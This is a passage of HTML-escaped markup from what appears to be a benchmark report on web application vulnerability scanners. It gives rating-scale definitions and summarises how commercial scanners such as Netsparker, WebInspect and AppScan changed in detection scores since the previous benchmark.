glossary table:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;left&quot; dir=&quot;ltr&quot;&gt;
&lt;table border=&quot;1&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;MsoNormalTable&quot; style=&quot;border-collapse: collapse; border: none; margin-left: 5.4pt; mso-border-alt: solid windowtext .5pt; mso-padding-alt: 0cm 5.4pt 0cm 5.4pt; mso-yfti-tbllook: 1184;&quot;&gt;
 &lt;tbody&gt;
&lt;tr&gt;
  &lt;td style=&quot;background: #C4BC96; border: solid windowtext 1.0pt; mso-background-themecolor: background2; mso-background-themeshade: 191; mso-border-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 106.35pt;&quot; valign=&quot;top&quot; width=&quot;142&quot;&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Title&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;background: #C4BC96; border-left: none; border: solid windowtext 1.0pt; mso-background-themecolor: background2; mso-background-themeshade: 191; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 240.95pt;&quot; valign=&quot;top&quot; width=&quot;321&quot;&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Possible Values&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr&gt;
  &lt;td style=&quot;border-top: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 106.35pt;&quot; valign=&quot;top&quot; width=&quot;142&quot;&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Configuration and Usage Scale&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 240.95pt;&quot; valign=&quot;top&quot; width=&quot;321&quot;&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Very Simple &lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;-
  GUI + Wizard&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Simple&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt; - GUI
  with simple options, Command line with scan configuration file or simple
  options&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Complex&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
  - GUI with numerous options, Command line with multiple options&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Very Complex&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
  - Manual scanning feature dependencies, multiple configuration requirements&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr&gt;
  &lt;td style=&quot;border-top: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 106.35pt;&quot; valign=&quot;top&quot; width=&quot;142&quot;&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Stability Scale&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 240.95pt;&quot; valign=&quot;top&quot; width=&quot;321&quot;&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Very Stable&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
  - Rarely crashes, Never gets stuck&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Stable&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt; -
  Rarely crashes, Gets stuck only in extreme scenarios&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Unstable&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
  - Crashes every once in a while, Freezes on a consistent basis&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Fragile &lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;–
  Freezes or Crashes on a consistent basis, Fails performing the operation in
  many cases&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr&gt;
  &lt;td style=&quot;border-top: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 106.35pt;&quot; valign=&quot;top&quot; width=&quot;142&quot;&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Performance Scale&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 240.95pt;&quot; valign=&quot;top&quot; width=&quot;321&quot;&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Very Fast&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
  - Fast implementation with limited amount of scanning tasks&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Fast&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt; - Fast
  implementation with plenty of scanning tasks&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Slow&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt; - Slow
  implementation with limited amount of scanning tasks&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Very Slow&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
  - Slow implementation with plenty of scanning tasks&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Scan Logs&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;In order to access the scan logs and detailed scan results
of each scanner, simply access the scan-specific information for that scanner,
by clicking on the scanner &lt;b&gt;version&lt;/b&gt; in the various comparison charts: &lt;/span&gt;&lt;a href=&quot;http://sectoolmarket.com/&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;http://sectoolmarket.com/&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;u&gt;&lt;span style=&quot;font-size: x-large;&quot;&gt;21. What Changed?&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Since the latest benchmark, many open source and commercial tools added new features and improved their detection accuracy.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The following list presents a summary of changes in the
detection accuracy and coverage of &lt;b&gt;Commercial&lt;/b&gt; tools that were tested in
the previous benchmark (+new):&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*) &lt;b&gt;&lt;u&gt;NTOSpider&lt;/u&gt;&lt;/b&gt; – NTOSpider last assessment took
place in 2011, and since then there has been a &lt;b&gt;significant&lt;/b&gt; &lt;b&gt;improvement&lt;/b&gt;
in all the test categories, as well as new results for tests not performed in
2011. It also came out &lt;b&gt;FIRST&lt;/b&gt; in the &lt;b&gt;WIVET&lt;/b&gt; category (along with 3
other products) and the &lt;b&gt;XSS&lt;/b&gt; category (along with 10 others), and got
high scores in many others. The rankings it got for the new tests
(redirect/backup) were mixed.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*) &lt;b&gt;&lt;u&gt;N-Stalker (Commerical Edition)&lt;/u&gt;&lt;/b&gt; – The
commercial edition of N-Stalker was &lt;b&gt;&lt;i&gt;assessed&lt;/i&gt;&lt;/b&gt; in this benchmark &lt;b&gt;&lt;i&gt;for&lt;/i&gt;&lt;/b&gt;&lt;i&gt;
&lt;b&gt;the first time&lt;/b&gt;&lt;/i&gt;. The only comparable result was to the XSS result of
the free version tested in 2012, and in that case, there was a &lt;b&gt;significant
improvement&lt;/b&gt;. The rest of the results got it various ranks.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*) &lt;b&gt;&lt;u&gt;Qualys&lt;/u&gt;&lt;/b&gt; – Qualys was first tested in 2012,
and since then. The WIVET score didn&#39;t change (still &lt;b&gt;one of the&lt;/b&gt; &lt;b&gt;highest&lt;/b&gt;),
and there are some new test results as well, but the SQL Injection and
Reflected XSS results are actually &lt;b&gt;worse&lt;/b&gt;, due to what I currently
attribute to temporary &lt;b&gt;bugs&lt;/b&gt;, either in the product or (less likely) my
testing procedure.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*) &lt;b&gt;ScanToSecure&lt;/b&gt; – Another new SAAS service which is
assessed for the first time, and got results that were almost identical to
those of Netsparker.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*) &lt;b&gt;&lt;u&gt;Netsparker (Commercial Edition)&lt;/u&gt;&lt;/b&gt; – Netsparker
results were improved in almost every single category. The WIVET score was
slightly improved (one of the &lt;b&gt;highest&lt;/b&gt;), it came out &lt;b&gt;FIRST &lt;/b&gt;in the &lt;b&gt;Reflected
XSS&lt;/b&gt; (along with 10 others) and &lt;b&gt;Remote File Inclusion&lt;/b&gt; (along with 4
others) categories, dramatically improved the previous Local File Inclusion
results (one of the &lt;b&gt;highest&lt;/b&gt; results), and got a great results in many
other tests. Like the vast majority of the products in the industry, its
results were somehow mixed in the new tests (backup/redirect).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;b&gt;&lt;u&gt;WebInspect&lt;/u&gt;&lt;/b&gt;&lt;i&gt; – &lt;/i&gt;Webinspect
significantly improved its scores in various categories: It was the only &lt;b&gt;winner&lt;/b&gt;
in the &lt;b&gt;client/barrier coverage&lt;/b&gt; feature comparison, came out &lt;b&gt;FIRST&lt;/b&gt;
in the &lt;b&gt;WIVET&lt;/b&gt; assessment (along with 3 others), the &lt;b&gt;Remote File
Inclusion&lt;/b&gt; (along with 4 others), &lt;b&gt;Reflected XSS&lt;/b&gt; (along with 10
others) and &lt;b&gt;SQL Injection&lt;/b&gt; (along with 4 others) categories, got
surprisingly &lt;b&gt;high&lt;/b&gt; &lt;b&gt;score&lt;/b&gt; in the new (and secret) Unvalidated
Redirect category (highest among commercial), and plenty of other high scores
in different categories, but didn&#39;t get a good score in the backup/hidden file
detection assessment.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*) &lt;b&gt;AppScan&lt;/b&gt; – AppScan too significantly improved its
scores in various categories: It was the only &lt;b&gt;winner&lt;/b&gt; in the &lt;b&gt;Local
File Inclusion &lt;/b&gt;and &lt;b&gt;Supported Audit Features&lt;/b&gt; categories, got one of
the highest WIVET scores, came out &lt;b&gt;FIRST&lt;/b&gt; in the SQL Injection (along
with 4 others), Reflected XSS (along with 10 others) and &lt;b&gt;Remote File
Inclusion&lt;/b&gt; (along with 4 others) categories, got plenty of high scores in
other categories, but got mixed results in the new tests (backup/hidden files
and unvalidated redirect).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*) &lt;b&gt;&lt;u&gt;Acunetix WVS&lt;/u&gt;&lt;/b&gt; (Commercial Edition) – Acunetix
slightly improved the results from the previous benchmarks, and got some &lt;b&gt;very
interesting&lt;/b&gt; new results: it got the &lt;b&gt;BEST SCORE &lt;/b&gt;in the &lt;b&gt;NEW&lt;/b&gt; &lt;b&gt;Backup/Hidden
Files&lt;/b&gt; category among commercial scanners (and some would argue, in total),
